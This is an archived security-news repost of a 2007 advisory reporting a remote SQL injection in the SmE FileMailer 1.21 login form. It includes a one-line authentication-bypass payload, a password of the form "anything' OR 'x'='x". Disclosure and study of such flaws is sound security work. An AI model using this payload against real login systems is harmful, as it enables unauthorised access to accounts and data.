_
_ _ 11.21.2008
 
_ Navigation: _
Main Page Technology Downloads Security Entertainment Videos
Search Site: Advanced
_
 
Login Login
 
Register Register
   
_ News Item

smefilemailer-sql.txt

Jan 22 2007 19:06:06
Source: ace
vote bad  vote good
0
-=[--------------------ADVISORY-------------------]=-

SmE FileMailer 1.21

Author: CorryL [corryl80@gmail.com]
-=[-----------------------------------------------]=-


-=[+] Application: SmE FileMailer
-=[+] Version: 1.21
-=[+] Vendor's URL: http://www.scriptme.com/down/13
-=[+] Platform: Windows\Linux\Unix
-=[+] Bug type: sql injection
-=[+] Exploitation: Remote
-=[-]
-=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~
-=[+] Reference: www.x0n3-h4ck.org
-=[+] Virtual Office: http://www.kasamba.com/CorryL
-=[+] Irc Chan: irc.darksin.net #x0n3-h4ck


..::[ Descriprion ]::..

SMe FileMailer lets you require visitors to submit their name and email address in order to retrieve a file from your site.

Upon submitting the information, the link for file is sent to the visitor via email.

This is a great way to stop leeching and third-party linking of your files, and it also lets you know exactly who's obtaining your files!



..::[ Proof Of Concept ]::..

In the login form insert

Login: admin

Password: anything' OR 'x'='x


..::[ Disclousure Timeline ]::..

[16/01/2007] - Public disclousure
.

» full story @ source-link: ace
Related Articles:
» Xpression News 1.0.1 (archives.php) Remote File Disclosure Exploit
» S-Gastebuch <= 1.5.3 (gb_pfad) Remote File Include Exploit
» PHP-Nuke Module Emporium <= 2.3.0 Remote SQL Injection Exploit
» SendStudio <= 2004.14 (ROOTDIR) Remote File Inclusion Vulnerability
_ Comments
Add Comment
You must be registered and logged in to add comments!

Register
Login
_ Sponsors

_ Sponsors